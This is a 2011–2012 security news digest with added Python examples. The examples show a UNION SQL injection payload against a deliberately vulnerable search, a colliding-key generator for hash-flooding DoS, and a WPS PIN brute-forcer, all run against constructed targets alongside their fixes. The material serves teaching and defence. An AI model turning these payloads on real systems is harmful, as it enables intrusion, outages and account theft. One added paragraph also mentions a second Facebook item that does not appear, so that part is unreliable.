McAfee software lets scammers hijack PCs to send spam. McAfee is looking into a problem with a service in its SaaS Endpoint Protection software that appears to be allowing computers to serve as open proxies for sending spam, the company told CNET January 17. “We are aware of the issue and have both threat analytics and development teams diligently analyzing the problem and possible solutions,” the company said in a statement. “We will have more information on the issue shortly.” The problem was reported by McAfee customers on the Web who complained their e-mails were being blocked by e-mail providers and their IP addresses were being blacklisted for sending spam. The problem appears to be in the RumorServer Service myAgtSvc.exe, McAfee Peer Distribution Service, which is part of McAfee SaaS Endpoint Protection Suite, previously known as Total Protection Service, according to the Kaamar Blog. The technology, used for delivering updates to computers without a direct Internet connection, serves as an Open Proxy on
01/18/12
Linux developers fix a homemade network problem. Linux kernels 3.0.17, 3.1.9, and 3.2.1 fix a problem with the handling of IGMP packets that was introduced with updates in Linux 2.6.36. An IGMPv3 protocol packet processed soon after an IGMPv2 packet could lead to a system crash caused by a kernel panic. On January 6, a researcher reported strange crashes of his Linux notebook in the Debian bug database. A Debian developer found the problem was caused by a division by 0 that can occur with IGMP packets that have a Maximum Response Time of 0. As a result, Linux systems running kernel version 2.6.36 or later, up until the patched versions, can be crashed remotely using certain IGMP packets if a program has registered to receive multicast packets from the network. Typical examples of such programs include the avahi mDNS server or media players, such as VLC, that support RTP. Active attacks should technically only be possible within local networks, because IGMP traffic is usually not routed beyond network boundaries. However, the Debian developer pointed out that particular unicast packets may serve for attacks via the Internet unless they are blocked by a firewall. Now that a fix has been released, distributors should soon offer updated kernel packages that no longer contain the vulnerability.
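The item above describes the bug only in outline. The following added example, which is not the Linux kernel's code and not part of the original page, decodes the IGMPv3 Max Resp Code field as defined in RFC 3376 (section 4.1.1) and shows why a decoded value of 0 must be clamped before it is used as the modulus of the randomised report delay. The query bytes are constructed here; the clamp to one tick is this example's assumption about the shape of a fix, not a copy of the kernel patch.

```python
"""Added example for the IGMP item above; not the Linux kernel's code."""
import struct

IGMP_MEMBERSHIP_QUERY = 0x11


def decode_max_resp_code(code: int) -> int:
    """Return the maximum response time in tenths of a second.
    Codes below 128 are literal; 128 and above carry a 3-bit exponent and a
    4-bit mantissa and decode as (mant | 0x10) << (exp + 3)."""
    if code < 128:
        return code
    exp = (code >> 4) & 0x7
    mant = code & 0xF
    return (mant | 0x10) << (exp + 3)


def build_query_v3(code: int, group: bytes = b"\x00\x00\x00\x00") -> bytes:
    """Constructed 12-byte IGMPv3 general query. The checksum is left as 0
    because this example does not verify it."""
    header = struct.pack("!BBH4s", IGMP_MEMBERSHIP_QUERY, code, 0, group)
    # Resv/S/QRV, QQIC, Number of Sources (RFC 3376 section 4.1)
    return header + struct.pack("!BBH", 0, 0, 0)


def parse_query(pkt: bytes) -> dict:
    if len(pkt) < 8:
        raise ValueError("short IGMP packet")
    igmp_type, code, _csum, group = struct.unpack("!BBH4s", pkt[:8])
    if igmp_type != IGMP_MEMBERSHIP_QUERY:
        raise ValueError("not a membership query")
    # An 8-byte query is v1/v2; v3 queries carry at least 12 bytes.
    version = 3 if len(pkt) >= 12 else 2
    return {"version": version, "code": code, "group": group}


def unguarded_delay(max_delay: int, rnd: int) -> int:
    """The unsafe pattern: a random value reduced modulo the maximum delay.
    Python raises ZeroDivisionError for a 0 modulus; a kernel panics."""
    return rnd % max_delay


def report_delay_ticks(pkt: bytes, rnd: int, hz: int = 100) -> int:
    """Guarded version: a zero maximum delay is clamped to one tick
    (an assumption of this example, not the kernel's exact code)."""
    q = parse_query(pkt)
    tenths = decode_max_resp_code(q["code"]) if q["version"] == 3 else q["code"]
    max_delay = tenths * hz // 10          # tenths of a second -> timer ticks
    if max_delay == 0:
        max_delay = 1
    return rnd % max_delay


if __name__ == "__main__":
    zero_query = build_query_v3(0)
    print("guarded delay for code 0:", report_delay_ticks(zero_query, 57))
    try:
        unguarded_delay(0, 57)
    except ZeroDivisionError:
        print("unguarded path: modulus by zero (a kernel would panic here)")
```

The point to take away is that the decoded maximum delay is attacker-controlled data; any divisor or modulus derived from it needs a floor before use.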
Facebook chat phishing attack impersonates Facebook security team. A new phishing attack spreading through Facebook chat modifies hijacked accounts to impersonate the social network’s security team. The attackers replace the profile picture of compromised accounts with the Facebook logo and change their names to a variation of “Facebook Security” written with special Unicode characters, said a Kaspersky Lab expert. Facebook claims changing the profile name can take up to 24 hours and is subject to confirmation. However, in the expert’s tests the change occurred almost instantly and required only the password. This was also confirmed by a victim whose profile name was modified within 5 minutes of their account being compromised, he said. After the victim’s profile name and picture get changed, the attackers send out a chat message to all of their contacts informing them their accounts will be suspended unless they re-confirm their information. The rogue messages appear to be signed by “The Facebook Team” and contain a link to a phishing page hosted on an external domain. The Web page mimics Facebook’s design and asks for name, e-mail, password, security question, country, birth date, and other information needed to hijack the account. However, the attack does not stop there. According to the expert, a second form asks users for their credit card details and billing address. This is unusual for Facebook phishing attacks, the majority of which target only social networking account information.
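Both Facebook items above describe look-alike pages that collect credentials and send them to a server the attacker controls, in the first case over plain HTTP. As an added example, not code from either report, the check below parses a page and flags any form containing a password field that submits to a host other than the page's own, over plaintext HTTP, or via GET. The two sample pages, their URLs and the trusted-host set are constructed for the example.

```python
"""Added example: flag credential forms that post off-site or in the clear."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class FormScanner(HTMLParser):
    """Collects each <form> with its action, method and whether it holds a
    password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._cur = {"action": a.get("action", ""),
                         "method": (a.get("method") or "get").lower(),
                         "has_password": False}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None \
                and a.get("type", "").lower() == "password":
            self._cur["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def credential_leak_findings(page_url: str, html: str, trusted_hosts) -> list:
    """Return human-readable findings for password forms on the page."""
    scanner = FormScanner()
    scanner.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        target = urlparse(urljoin(page_url, form["action"]))
        if target.hostname != page_host and target.hostname not in trusted_hosts:
            findings.append(f"password form posts off-site to {target.hostname}")
        if target.scheme == "http":
            findings.append(f"password form submits over plaintext HTTP to {target.hostname}")
        if form["method"] == "get":
            findings.append("password form uses GET; credentials end up in URLs and logs")
    return findings


# Constructed sample: a lure page whose form ships credentials elsewhere.
PHISH_URL = "http://free-recharge.example/fb/index.php"
PHISH_HTML = """<html><body>
<form action="http://collector.example/post.php" method="post">
  <input type="text" name="email">
  <input type="password" name="pass">
  <input type="submit" value="Log In">
</form></body></html>"""

# Constructed sample: a site posting to itself over HTTPS.
BENIGN_URL = "https://login.example-site.test/login"
BENIGN_HTML = """<form action="/session" method="post">
<input type="email" name="email"><input type="password" name="password"></form>"""

TRUSTED_HOSTS = {"login.example-site.test"}

if __name__ == "__main__":
    for url, html in ((PHISH_URL, PHISH_HTML), (BENIGN_URL, BENIGN_HTML)):
        print(url, credential_leak_findings(url, html, TRUSTED_HOSTS))
```

Running this against a fetched page is a cheap triage step for a reported lure; it does not prove a page is benign, since a phishing kit can also post to its own host over HTTPS.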
Popular live-blogging site says data files were breached. CoveritLive, a popular, Web-based live-blogging program used worldwide, said January 13 it discovered “certain proprietary data files” of its users “were accessed without authorization,” but “no financial account information has been compromised. We have not yet determined if, or to what extent, CoveritLive account information (i.e., user names, email addresses and/or passwords) was accessed,” Demand Media, which bought CoveritLive in 2011, said in an e-mail to its users. Those users include bloggers, journalists, and mainstream media organizations, including msnbc.com, FoxNews.com, ESPN, and the BBC. Many people use CoveritLive’s free services, but there are premium accounts. Live-blogged events hosted by CoveritLive draw more than 60 million people every month, the company says, 60 percent of whom are from outside the United States. CoveritLive said the files were breached “starting on or about” January 7, and an investigation is “ongoing.” In the meantime, as a “precautionary measure,” all users were asked to reset their passwords January 14.
01/17/12
American Express fixes critical security vulnerability. American Express has fixed a security vulnerability on its Web site that allowed SQL injection and, therefore, direct access to its server’s database, H Security reported January 13. The company acted after a tip-off. A student discovered that pages of the American Express Web site did not adequately filter data passed to a search function, thereby allowing direct access to the server. He sent a message about this SQL injection problem to the Heise Security team, who were able to reproduce it; the information was then passed on to American Express. The company reacted quickly and fixed the vulnerability within a few days. It stated the vulnerability had not been used and no customer data had been compromised. Some experts doubt this statement, however, since SQL injection frequently allows access to all of an affected system’s data, and tables with names such as “Accounts” often show up in SQL statements. Of particular concern is that the vulnerability was found not in some hidden corner but in the search function, the first place someone would test for such problems.
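The report does not show the flawed query, so the following is an added example rather than American Express's code: a search handler that splices user input into SQL beside the parameterized version, run against an in-memory SQLite database. The tables, rows and the UNION payload are constructed for the example; they illustrate why a search box that is injectable exposes every table the application's database user can read.

```python
"""Added example: string-built search query beside its parameterized fix."""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed schema: a public FAQ table and a sensitive accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE faq (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO faq (title) VALUES (?)",
                     [("How do I reset my password",), ("Replacing a lost card",)])
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, holder TEXT, card_last4 TEXT)")
    conn.executemany("INSERT INTO accounts (holder, card_last4) VALUES (?, ?)",
                     [("Alice Example", "1111"), ("Bob Example", "2222")])
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """Input is concatenated into the statement, so a quote in `term`
    changes the structure of the query."""
    sql = "SELECT title FROM faq WHERE title LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_safe(conn: sqlite3.Connection, term: str) -> list:
    """Input is bound as a parameter; it can only ever be a LIKE pattern."""
    sql = "SELECT title FROM faq WHERE title LIKE ?"
    return [row[0] for row in conn.execute(sql, ("%" + term + "%",))]


# Classic UNION payload: closes the string, appends a query against another
# table, and comments out the trailing %' with --.
UNION_PAYLOAD = "' UNION SELECT holder || ':' || card_last4 FROM accounts --"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", search_vulnerable(db, UNION_PAYLOAD))
    print("parameterized:", search_safe(db, UNION_PAYLOAD))
```

The parameterized form returns nothing for the payload because the whole string is matched as a pattern; the concatenated form returns the FAQ rows plus every account row. Input filtering, the remedy the report mentions, is second best to binding parameters.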
01/12/12
Phishing emails from spoofed US-CERT addresses. The U.S. Computer Emergency Readiness Team (US-CERT) has issued a public warning about a phishing e-mail campaign using spoofed US-CERT e-mail addresses. "The subject of the phishing email is: 'Phishing incident report call number: PH000000XXXXXXX' containing an attachment titled 'US-CERT Operation Center Report XXXXXXX.zip', with the 'X' possibly indicating a random value or string," US-CERT explained on its site. "The zip attachment contains an executable file with the name 'US-CERT Operation CENTER Reports.eml.exe'. Reports indicate that SOC@US-CERT(dot)GOV is the primary email address being spoofed but other invalid email addresses are being used." According to the organization, the e-mail was sent to employees of many private sector organizations and of federal, state, and local governments during the last few days. The attached executable is an as yet unspecified type of malware. US-CERT advises users not to download and run the attachment or even open the e-mail in question, but to delete it.
Security updates from Microsoft and Adobe. Microsoft and Adobe each released a series of security patches for their products January 10. Microsoft released seven bulletins to close eight security holes in its products. These include vulnerabilities — in Windows Media, Windows Packager, and Windows Object Manager — which the company rates as critical. The bugs could be exploited by attackers to inject and execute malicious code on a victim's system via a specially crafted file. However, Windows 7 is not affected by the problem in Windows Media. The company finally released an update for Internet Explorer to fix the vulnerability in the SSL3.0/TLS1.0 protocol that has been known about since September. The related attack, known as BEAST (Browser Exploit against SSL/TLS), allows attackers to, for example, decrypt cookies that are transmitted in encrypted form and use them for unauthorized Web page logins. Microsoft planned to publish this update in December but later delayed the release due to compatibility issues with third party products. Adobe published versions 10.1.2 and 9.5 of its Acrobat and Reader products for Windows and Mac OS X. The updates fix critical vulnerabilities that could be used by an attacker to cause the application to crash and potentially take control of an affected system. Versions 10.1.1 and 9.4.7 and earlier of Acrobat and Reader are affected; all users are advised to upgrade.
01/11/12
Spam emails link to QR codes. The Websense ThreatSeeker Network reported it has started spotting spam messages leading to URLs that use embedded QR codes, according to Help Net Security January 10. The discovery indicated a clear movement and evolution of traditional spammers towards targeting mobile technology. The spam e-mail messages look like traditional pharmaceutical spam e-mails and contain a link to the Web site 2tag.nl. This is a legitimate Web service that allows users to create QR codes for URLs. Once the 2tag.nl URL from the mail message is loaded in the browser, a QR code is displayed, along with the full URL the QR code resolves to on the right. When the QR code is read by a QR reader, it automatically loads the spam URL (or asks before loading, depending on which QR reader the user has installed).
01/10/12
FBI warns of malware phishing scam. The FBI issued a warning the week of January 2, on a new Internet blight called “Gameover,” which, once ensconced on a PC, can steal usernames and passwords and defeat common methods of user authentication employed by financial institutions. The FBI said it has seen an increase in the use of Gameover, which is an e-mail phishing scheme that invokes the names of prominent government financial institutions — the National Automated Clearing House Association (NACHA), the Federal Reserve Bank, or the Federal Deposit Insurance Corporation (FDIC). The FBI said Gameover is a newer variant of the Zeus malware, which was created several years ago and specifically targeted banking information. This is how the FBI described the scam: “Typically, you receive an unsolicited e-mail from NACHA, the Federal Reserve, or the FDIC telling you that there’s a problem with your bank account or a recent ACH transaction. The sender has included a link in the e-mail for you that will supposedly help you resolve whatever the issue is. Unfortunately, the link goes to a phony website, and once you’re there, you inadvertently download the Gameover malware, which promptly infects your computer and steals your banking information. After the perpetrators access your account, they conduct what’s called a distributed denial of service, or DDoS, attack using a botnet, which involves multiple computers flooding the financial institution’s server with traffic in an effort to deny legitimate users access to the site.” The FBI went on to say some of the funds stolen from bank accounts go towards the purchase of precious stones and expensive watches from high-end jewelry stores.
Adobe plans critical security updates for Reader, Acrobat next week. Adobe said January 6 it will issue critical fixes for its popular Reader and Acrobat products January 10. The company said it is planning to release updates for Adobe Reader and Acrobat versions X and earlier for the Windows and Macintosh platforms to fix a slew of critical security issues. They include the vulnerabilities CVE-2011-2462 and CVE-2011-4369, which were patched in Adobe products up through version 9 in December, the company said on its PSIRT blog. The January patch will be released January 10 as part of Adobe’s monthly patch cycle.
01/09/12
Symantec confirms source code leak in two enterprise security products. Symantec confirmed January 5 that source code used in two of its older enterprise security products was publicly exposed by hackers the week of January 2. In a statement, the company said the compromised code is between 4 and 5 years old and does not affect Symantec’s consumer-oriented Norton products as was previously speculated. “Our own network was not breached, but rather that of a third party entity,” the company said in the statement. “We are still gathering information on the details and are not in a position to provide specifics ... Presently, we have no indication that the code disclosure impacts the functionality or security of Symantec’s solutions,” the statement said. A Symantec spokesman identified the two affected products as Symantec Endpoint Protection 11.0 and Symantec Antivirus 10.2. Both are targeted at enterprise customers and are more than 5 years old, he said. Symantec is developing a remediation process for enterprise customers still using the affected products, he noted. An Indian hacking group calling itself Lords of Dharmaraja earlier claimed it accessed source code for Symantec’s Norton AV products.
Chrome 17 enters beta, improves speed and security. Version 17 of Chrome has been released into the WebKit-based browser’s Beta channel, H Security reported January 6. Its developers said the new Chrome beta, version 17.0.963.26, is focused on improving security. With this version, Chrome’s Safe Browsing technology has been extended to protect against malicious downloads by analyzing executable files, including Windows .exe and .msi files. If a user visits a Web site and is tricked into downloading, for example, a fake anti-virus product, Chrome will issue a warning if the file appears to be malicious and will advise the user to discard it. The Chrome team at Google also updated the browser’s Stable channel to version 16.0.912.75, closing three high risk security holes. These include a use-after-free in animation frames, a heap-buffer-overflow in the libxml software library, and a stack-buffer-overflow in glyph handling.
Sony website defacer pawned by second hacker. A defacer affiliated with Anonymous vandalized Sony’s online front door the week of January 2 over the company’s support of the Stop Online Piracy Act, a hated anti-piracy law proposed in the U.S., The Register reported January 6. The Sony Pictures Web site was defaced and unauthorized comments were posted on the company’s Facebook page. The digital graffiti was scribbled by a hacker who uses the Twitter handle s3rver_exe. Both acts of vandalism were rapidly purged, while the YouTube video illustrating the hack was quickly pulled. The latest security breach comes after Sony announced it was bolstering its electronic defenses following the PlayStation Network hack in 2011, which forced Sony to take down its gaming platform for weeks.
01/06/12
SpyEye malware borrows Zeus trick to mask fraud. A powerful bank-fraud software program, SpyEye, has been seen with a feature designed to keep victims in the dark long after fraud has taken place, according to a January 4 report from security vendor Trusteer. SpyEye is notable for its ability to inject new fields into a Web page, a technique called HTML injection, which can ask banking customers for sensitive information they normally would not be asked. The requested data can include logins and passwords or a debit card number. It can also use HTML injection to hide fraudulent transfers of money out of an account by displaying an inaccurate bank balance. Trusteer found SpyEye also hides fraudulent transactions even after a person has logged out and logged back into their account. SpyEye does this by checking its records to see what fraudulent transactions were made with the account, then deleting them from the Web page, said Trusteer’s chief executive officer (CEO). The account balance is also altered. It appears SpyEye has borrowed from Zeus, a famous piece of banking malware now commonly available and considered its parent. Trusteer has seen the technique used when a fraudster uses SpyEye to capture debit card details. When that data is obtained, the fraudster conducts a purchase over the Web or phone, and SpyEye masks the transaction, the CEO said. It does not affect, however, the bank’s ability to see the fraud, he said.
Sites knocked offline by OpenDNS freeze on Google. Innocent Web sites were blocked and labelled phishers January 4 following an apparent conflict between OpenDNS and Google’s Content Delivery Network (CDN). OpenDNS — a popular domain name lookup service — sparked the outage by blocking access to googleapis.com, Google’s collection of useful scripts and apps for Web developers. According to reports, a flood of errors hit pages that used Google-hosted jQuery and hundreds of thousands of sites fell over. Visitors to Web sites were confronted with a message saying: “Phishing site blocked. Phishing is a fraudulent attempt to get you to provide personal information under false pretenses.” Other visitors were greeted with a 404 error. Web design and hosting specialist Brit-Net told The Register the outage lasted nearly 3 hours. As sites and service providers struggled to get back online, they employed fallback scripts and re-routed traffic to CDN. The cause of the problem with OpenDNS seemed to be the googleapi.com security certificates, according to a Brit-Net researcher.
New AOL Instant Messenger raises privacy concerns, EFF reports. The Electronic Frontier Foundation (EFF) analyzed the preview version of the latest AOL Instant Messenger and concluded users should not install it due to serious privacy concerns. The first issue is that conversation logs are stored by default; the second is that all private instant messages are scanned for URLs, which means all chats are sent to AOL’s servers in Virginia. AOL’s decision to move some of its services to the cloud, where data is usually stored in plain text, raises serious concerns because the data could be accessed by cybercriminals, or by law enforcement agencies with a warrant. The customers’ privacy is at stake because in both scenarios their private conversations may become exposed without their knowledge. The fact that conversations are sent to AOL’s servers to be scanned for URLs also concerns the EFF because AOL gives no clear indication in its terms of service or privacy policies of how this process works. The foundation believes the company should not only give users initial notice with an opt-in check box, but also explain to them in clear and specific terms how the information is handled. AOL promised to disable this functionality for conversations that are marked to be “off the record.” However, the “off the record” feature is available only for customers who use the latest version of the program.
01/05/12
Lilupophilupop SQL injection attack tops 1 million infected URLs. A SQL injection attack that has been ongoing for several weeks hit a threshold of more than 1 million infected URLs, Threatpost reported January 4. The attack was first identified and disclosed by researchers at the SANS Internet Storm Center in early December, and at the time there were only a few thousand infected pages. The attacks seemed to be targeting sites with backends running on IIS, ASP, or Microsoft SQL Server, and there were some indications the attackers were doing reconnaissance on the infected sites for some time before the actual attack. The attack, which included a script that redirected users to a URL at lilupophilupop(dot)com, was similar to other mass SQL injection attacks that surfaced in recent years. “Sources of the attack vary; it is automated and spreading fairly rapidly. The trail of the files ends up on “adobeflash page” or fake AV. Blocking access to the lilupophilupop site will prevent infection of clients should they hit an infected site and be redirected,” a SANS ISC researcher wrote in the initial analysis of the attack. The goal of the attack seems to be to drive victims to a site that is peddling fake AV or scareware. That is where the monetization portion of the scheme comes in, with the attackers trying to lure victims into paying a license fee for a fake AV program that they not only do not need, but that will also likely cause other problems on their machines.
Spyware pushed via Google ads. A Zscaler researcher recently spotted a suspicious looking ad for a free Flash Video player in his Google Reader. By clicking on the link he was taken to the download page of the player, which repeatedly states that the offered player is free. However, at the bottom of the page a disclosure statement reveals the software is bundled with additional products that “may include advertisement.” This particular piece of adware/spyware appears to install a toolbar along with the player, opens many ports in the system, attempts to connect with remote servers, and requests a number of URLs. “The ad was found on the RSS feed of a security company specialized in cleaning up infected websites,” the researcher said. “This highlights the fact that even reading content from otherwise legitimate resources can inadvertently lead users to unwanted applications when sites include third-party elements (JavaScript driven ads in this case, but also IFRAMES, widgets, etc.) that they do not have control over.”
01/04/12
Microsoft releases security update for DoS issue in ASP.NET. Microsoft rushed out an out-of-band security update to resolve a denial-of-service (DoS) issue that affects ASP.NET versions 1.1 and later on all supported versions of the .NET Framework. A large number of Web platforms are affected by the hash collision problem, but the company was among the first to act on it. The MS11-100 security bulletin fixes a vulnerability in the way ASP.NET hashes specially crafted requests: when malicious data is inserted into hash tables, the resulting collisions can overwhelm a server’s CPU, producing a DoS condition. The update also resolves other weaknesses. A spoofing vulnerability in the way return URLs are verified during forms authentication could be used for phishing: by exploiting it, an attacker can redirect a user to a malicious Web site set up to obtain private data. An authentication bypass vulnerability in ASP.NET Forms Authentication is more difficult to exploit, but if an attacker manages to register an account on the application and knows the name of the targeted account, he could use a specially crafted Web request to initiate any action, including code execution, using the targeted account. Finally, an authentication ticket caching weakness allows an attacker to execute arbitrary code because of the way cached content is handled by the framework when Forms Authentication is used with sliding expiry. Combined with some social engineering, an attacker could send a specially crafted link to potential victims who hold elevated privileges. Microsoft is not aware of any attacks in the wild using these vulnerabilities, but users are advised to install the update to prevent any incidents.
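The bulletin item states the hash-collision problem without showing the mechanism. The following added example, not Microsoft's code, builds a toy request-parameter table keyed by a Java-style string hash (h = h*31 + c) and feeds it attacker-chosen parameter names that all land in one bucket, so each insert scans every earlier entry. It then shows the two usual mitigations: a keyed, non-linear hash (BLAKE2b with a secret key here) and a cap on the number of parameters per request. The bucket count, key and names are constructed for the example.

```python
"""Added example: hash-collision DoS against a chained parameter table."""
import hashlib
import itertools

NBUCKETS = 1024
MASK = 0xFFFFFFFF


def weak_hash(s: str) -> int:
    """Java-style multiplicative string hash, truncated to 32 bits."""
    h = 0
    for ch in s:
        h = (h * 31 + ord(ch)) & MASK
    return h


def keyed_hash(s: str, key: bytes) -> int:
    """Keyed BLAKE2b: without the key the attacker cannot precompute
    names that collide."""
    digest = hashlib.blake2b(s.encode(), digest_size=8, key=key).digest()
    return int.from_bytes(digest, "big")


def colliding_names(n: int) -> list:
    """n distinct names sharing one weak_hash value. 'Aa' and 'BB' both
    hash to 2112 under h*31+c, and for any prefix state h both advance it
    to h*961 + 2112, so every concatenation of such pairs collides too;
    a random initial value alone would not break this."""
    k = max(1, (n - 1).bit_length())            # 2**k >= n
    names = ("".join(p) for p in itertools.product(("Aa", "BB"), repeat=k))
    return list(itertools.islice(names, n))


class ParamTable:
    """Chained hash table that counts key comparisons made during inserts."""

    def __init__(self, hash_fn, max_params=None):
        self.buckets = [[] for _ in range(NBUCKETS)]
        self.hash_fn = hash_fn
        self.max_params = max_params
        self.count = 0
        self.comparisons = 0

    def insert(self, name: str, value: str) -> None:
        if self.max_params is not None and self.count >= self.max_params:
            raise ValueError("too many request parameters")
        bucket = self.buckets[self.hash_fn(name) % NBUCKETS]
        for i, (k, _) in enumerate(bucket):
            self.comparisons += 1
            if k == name:
                bucket[i] = (name, value)
                return
        bucket.append((name, value))
        self.count += 1

    def longest_chain(self) -> int:
        return max(len(b) for b in self.buckets)


def fill(table: ParamTable, names) -> ParamTable:
    for name in names:
        table.insert(name, "x")
    return table


if __name__ == "__main__":
    names = colliding_names(1024)
    weak = fill(ParamTable(weak_hash), names)
    print("weak hash: longest chain", weak.longest_chain(), "comparisons", weak.comparisons)
    key = b"constructed-secret-key"          # would be per-process and random
    strong = fill(ParamTable(lambda s: keyed_hash(s, key)), names)
    print("keyed hash: longest chain", strong.longest_chain(), "comparisons", strong.comparisons)
```

With 1,024 colliding names the weak table performs 1024*1023/2 comparisons, and the cost grows quadratically with the request size; the keyed table spreads the same names across buckets, and the parameter cap bounds the work even when the hash cannot be changed.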
01/03/12
Your smartphone from Amazon has shipped malware-spreading spam. Softpedia reported December 30 a malware scam involving an e-mail allegedly sent by Amazon to confirm that an electronic device such as a smartphone has already been paid for with the recipient’s credit card. Users who click on the links contained in the message are taken to a Web site that serves a variant of Cridex, especially designed to steal personal and financial information from the computer it lands on, according to Hoax Slayer. Win32/Cridex is usually delivered via spammed malware such as variants of Exploit:JS/Blacole and is programmed to spread to removable drives. Besides banking credentials, it also targets local certificates and it is able to execute files. Once executed, the malicious element drops a copy of the worm as a randomly named file and modifies the registry to make sure it is executed each time the operating system boots. After the dropper is deleted, Cridex injects itself into every running process, even ones that are later created.
12/30/11
Beware of password-protected documents carrying malware. Symantec researchers have recently spotted malware masquerading as password-protected document files - Word documents, spreadsheets, PowerPoint presentations, and PDFs - being delivered as e-mail attachments, Help Net Security reported December 29. “Attackers are misusing the password feature to encrypt files, most likely to make it difficult for security products to detect them as malware,” said the researchers. “It also makes reverse-engineering the files difficult because they need to be decrypted before analysis can be performed.” As the contents of the files in question are encrypted, some antivirus solutions might not recognize them for what they are immediately but only after they are opened with the password.
12/29/11
WiFi protected setup PIN brute force vulnerability. The WiFi Protected Setup (WPS) PIN is susceptible to a brute force attack, the United States Computer Emergency Readiness Team (US-CERT) reported December 27 after being notified by a member of the public who uncovered the vulnerability. A design flaw in the WPS specification for PIN authentication significantly reduces the time required to brute force the entire PIN because it lets an attacker know when the first half of the 8-digit PIN is correct. The lack of a proper lockout policy after a certain number of failed PIN attempts on some wireless routers makes this brute force attack that much more feasible. The vulnerability affects routers from all major vendors.
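The item explains that the protocol leaks whether the first half of the PIN is right; the arithmetic behind that is worth seeing. The eighth PIN digit is a checksum of the first seven, so a naive attacker has 10^7 candidates, while one who learns the first half separately needs at most 10^4 + 10^3 = 11,000 attempts. The following added example, which is not US-CERT's or any vendor's code, computes the WPS checksum, runs the split search against a constructed registrar oracle with no lockout, and estimates how a lockout policy changes the wall-clock cost. The target PIN, timings and lockout parameters are constructed.

```python
"""Added example: WPS PIN checksum, split search, and lockout cost."""


def wps_checksum(first_seven: str) -> int:
    """Eighth digit: weight digits 1,3,5,7 by 3 and digits 2,4,6 by 1,
    then return the digit that brings the sum to a multiple of 10."""
    acc = 0
    for i, ch in enumerate(first_seven):
        acc += 3 * int(ch) if i % 2 == 0 else int(ch)
    return (10 - acc % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(pin[:7])


def naive_search_space() -> int:
    return 10 ** 7                    # 7 free digits, 8th is derived


def split_search_space() -> int:
    return 10 ** 4 + 10 ** 3          # 4 free digits, then 3 free + checksum


def make_oracle(target_pin: str):
    """Constructed stand-in for a registrar without lockout. Returns 0 when
    the first half is wrong (the exchange fails at the M4 step), 1 when only
    the second half is wrong (fails at M6), 2 when the PIN is correct."""
    def oracle(pin: str) -> int:
        if pin[:4] != target_pin[:4]:
            return 0
        return 2 if pin[4:] == target_pin[4:] else 1
    return oracle


def split_brute_force(oracle):
    """Return (recovered_pin, attempts). Phase 1 fixes the first half; phase 2
    needs at most 1000 guesses because the last digit is computed."""
    attempts = 0
    first = None
    for p1 in range(10_000):
        attempts += 1
        if oracle(f"{p1:04d}0000") >= 1:     # second half is a placeholder here
            first = f"{p1:04d}"
            break
    if first is None:
        return None, attempts
    for p2 in range(1000):
        attempts += 1
        seven = first + f"{p2:03d}"
        pin = seven + str(wps_checksum(seven))
        if oracle(pin) == 2:
            return pin, attempts
    return None, attempts


def lockout_time_hours(attempts: int, per_attempt_s: float = 1.0,
                       lock_after: int = 3, lock_s: float = 60.0) -> float:
    """Wall-clock cost if the registrar pauses for lock_s seconds after every
    lock_after failures. A lockout does not shrink the search space, it only
    makes exhausting it slow."""
    locks = (attempts - 1) // lock_after
    return (attempts * per_attempt_s + locks * lock_s) / 3600


if __name__ == "__main__":
    target = "12345670"                       # constructed; passes the checksum
    print("valid:", is_valid_pin(target))
    print("naive vs split:", naive_search_space(), split_search_space())
    pin, n = split_brute_force(make_oracle(target))
    print("recovered", pin, "after", n, "attempts")
    print("worst case with lockout (h): %.1f" % lockout_time_hours(split_search_space()))
```

The checksum rule used here is the one published in the WPS specification; the lockout numbers are only a model, since real registrars vary in whether and how long they lock.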
12/28/2011
Report: Phishing attack targets Apple customers. A “vast phishing attack” that attempts to capture the credit card information of Apple customers was launched December 25, according to a report from Mac security-software company Intego. In a posting on its Mac Security blog, Intego said that the attack was an attempt to fool Apple customers into clicking on a link under the guise of updating the billing information of their Apple accounts. Users who click on the link in the phony e-mail will be taken to a realistic looking sign-in page that asks for the user’s Apple ID and password. The user is then taken to a page asking them to update account profile information, including credit card information. Intego reported that the messages are being sent with the subject “Apple update your Billing Information” from a spoofed email address of “appleid@id.apple.com.”
Hackers target global analysis company. The global intelligence company Stratfor was hacked and had user information including credit card numbers posted online, CNN reported December 26. Around 4000 credit card numbers were released. Some Stratfor customers reported fraudulent charges being made to their credit cards after the information was posted on Pastebin. It was unclear whether the breach and apparent release of credit card information was the work of the activist hacking group Anonymous. The initial posting on Pastebin credited the AntiSec group, but a later message claiming to represent Anonymous denied any affiliation with the attack.
12/27/2011
Rift developer Trion Worlds hacked. Trion Worlds, the developer behind the massive multiplayer online game Rift, had its servers hacked, losing information that includes user names, passwords, e-mail addresses, billing addresses, and credit card information. The announcement was made on the official Trion Web site and through an e-mail sent to subscribers and anyone who previously held an account with the firm. It states that almost every piece of stored information about the company’s users was taken, including: “user names, encrypted passwords, dates of birth, email addresses, billing addresses, and the first and last four digits and expiration dates of customer credit cards.” Trion was quick to point out “There is no evidence, and we have no reason to believe, that full credit card information was accessed or compromised in any way.” The e-mail describes the hack as “recent” but does not provide a time frame for when it might have occurred or how long Trion has known about it.
